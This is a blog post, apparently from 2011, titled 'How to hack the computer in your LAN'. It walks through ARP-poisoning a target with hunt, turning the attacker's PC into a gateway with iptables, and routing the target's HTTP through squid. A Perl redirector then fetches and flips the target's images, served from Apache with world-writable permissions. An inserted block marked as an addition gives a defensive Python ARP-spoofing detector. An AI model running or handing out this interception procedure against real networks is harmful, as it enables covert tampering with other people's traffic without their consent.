
Tuesday, March 22, 2011

How to hack the computer in your LAN?



This is what we want to do:
  • Make the target send all HTTP packets to us instead of the gateway
  • Forward them to the real gateway
  • Modify the reply, turning the pictures upside-down
  • Forward the reply to the target
This is how we're going to do it:
  1. Poison the ARP table of the target
  2. Set up our PC as a gateway router
  3. Send all HTTP requests through a squid proxy
  4. Turn images upside-down with a squid script

OK, sounds great, let's get started!


1. Poison the ARP table of the target
We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about IP addresses and MAC addresses. When we want to send a packet to 10.0.0.1, an ARP request is sent out on the local LAN, asking "Which computer is at 10.0.0.1?", and 10.0.0.1 answers with an ARP reply: "I am at 10.0.0.1, with MAC address 11:22:33:44:55:66".

Then we send the packet to 11:22:33:44:55:66. ARP replies are cached in a local ARP table, so the next time we want to send to 10.0.0.1, we don't need to ask who's got it. We are going to send a fake ARP reply to the target (10.0.0.88), saying we are at 10.0.0.1. Usually ARP replies are accepted even though no request was sent, so this is actually really easy.
How do I do this?
We can use arpoison to construct a fake packet and send it, but I prefer a slightly more powerful tool called hunt. You can download the hunt source code here, and compile it like this:

tar zxvf hunt-1.5.tgz
cd hunt-1.5
make

Fire up hunt:
sudo ./hunt
In the menu system go to
a) daemons rst/arp/sniff/mac
b) arp spoof + arp relayer daemon
c) insert single/range arp spoof
d) start/stop relayer daemon (press s)
Type in the IP of the real gateway, your MAC address (find this by running ifconfig), and the target's IP. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing "arp -a" on the target and checking that the gateway IP has your MAC address.
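Seen from the defender's side, that same "arp -a" check can be automated. The following is an added example, not part of the original post: it parses "arp -a" output and flags a gateway whose MAC differs from a pinned value, or one MAC answering for several IPs. The sample tables, the 10.0.0.2 and 10.0.0.7 hosts and the aa:bb:cc:dd:ee:ff address are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches "? (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0" (Linux/macOS)
# and "  10.0.0.1     11-22-33-44-55-66   dynamic" (Windows).
ENTRY = re.compile(r"\(?(\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
                   r"((?:[0-9A-Fa-f]{1,2}[:-]){5}[0-9A-Fa-f]{1,2})\b")
BROADCAST = "ff:ff:ff:ff:ff:ff"

def normalize_mac(mac):
    """Lower-case, colon-separated, zero-padded (macOS prints 0:1c:...)."""
    return ":".join(p.zfill(2) for p in re.split("[:-]", mac.lower()))

def parse_arp_table(text):
    """Return {ip: mac} for every complete entry in `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.search(line)
        if m:
            table[m.group(1)] = normalize_mac(m.group(2))
    return table

def find_spoofing(table, gateway_ip, pinned_gateway_mac):
    """Flag a gateway MAC that differs from the pinned one, and shared MACs."""
    findings = []
    seen = table.get(gateway_ip)
    if seen and seen != normalize_mac(pinned_gateway_mac):
        findings.append(("gateway_mac_changed", gateway_ip, seen))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and mac != BROADCAST:
            findings.append(("shared_mac", mac, sorted(ips)))
    return findings

# Constructed samples: the target's table before and after poisoning.
CLEAN = """? (10.0.0.1) at 11:22:33:44:55:66 [ether] on eth0
? (10.0.0.2) at aa:bb:cc:dd:ee:ff [ether] on eth0
? (10.0.0.7) at <incomplete> on eth0"""
POISONED = """Interface: 10.0.0.88 --- 0xb
  10.0.0.1              AA-BB-CC-DD-EE-FF     dynamic
  10.0.0.2              aa-bb-cc-dd-ee-ff     dynamic
  10.0.0.255            ff-ff-ff-ff-ff-ff     static"""

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_spoofing(parse_arp_table(text), "10.0.0.1",
                                  "11:22:33:44:55:66"))
```

A shared MAC is not always hostile (proxy ARP and multi-homed hosts produce it too), so treat that finding as a lead to investigate, while a changed gateway MAC warrants immediate attention.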


2. Set up our pc as a gateway router
This is easy, just run these commands:

sudo iptables -F
sudo iptables -F -t nat
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
Here eth0 is your network interface connected to the LAN. The changes are reset the next time the network is reloaded.


3. Send all http requests through a squid proxy
Install squid and reset its config:

sudo apt-get install squid
sudo mv /etc/squid/squid.conf /etc/squid/squid.conf.default
Edit /etc/squid/squid.conf with your favorite editor like this:
http_port 127.0.0.1:8080
http_port 10.0.0.2:8080

visible_hostname gateway.my.flat
cache_mgr proxy@foo.com

httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on

acl all src 0.0.0.0/0.0.0.0
http_access allow all
redirect_program /var/redirect

4. Turn images upside-down with a squid script
We use the redirect program defined in the squid config to flip our images. Edit /var/redirect to look like this:


#!/usr/bin/perl
# Squid redirector: reads one request per line on stdin and prints the
# URL squid should fetch instead.
$| = 1;        # unbuffered output, squid waits for each answer
$count = 0;
$pid = $$;     # process id keeps file names unique per redirector
while (<>) {
    chomp $_;
    if ($_ =~ /(.*\.jpg)/i) {
        $url = $1;
        # Fetch the image, flip it, and serve the copy from the local web server
        system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.jpg", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.jpg");
        system("/bin/chmod", "777", "/var/www/$pid-$count.jpg");
        print "http://127.0.0.1/$pid-$count.jpg\n";
    }
    elsif ($_ =~ /(.*\.gif)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O", "/var/www/$pid-$count.gif", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/$pid-$count.gif");
        system("/bin/chmod", "777", "/var/www/$pid-$count.gif");
        print "http://127.0.0.1/$pid-$count.gif\n";
    }
    else {
        # Anything else passes through unchanged
        print "$_\n";
    }
    $count++;
}
As you can see from the script, we need to serve the flipped images from a local web server. Therefore, install Apache:
sudo apt-get install apache2
sudo chmod -R 777 /var/www
Finally, restart squid with the new configuration:
sudo /etc/init.d/squid restart
You can test squid by configuring Firefox to use localhost:8080 as a proxy server.

YOU HAVE NOW HACKED THE TARGET COMPUTER!

Thanks....

About 'Anu': My name is 'Anu', also known as 'ANU 007 TIGER'. I'm administrator of 'PC Tips by Anu' blog. This blog was opened for sharing contents about hacking n cracking.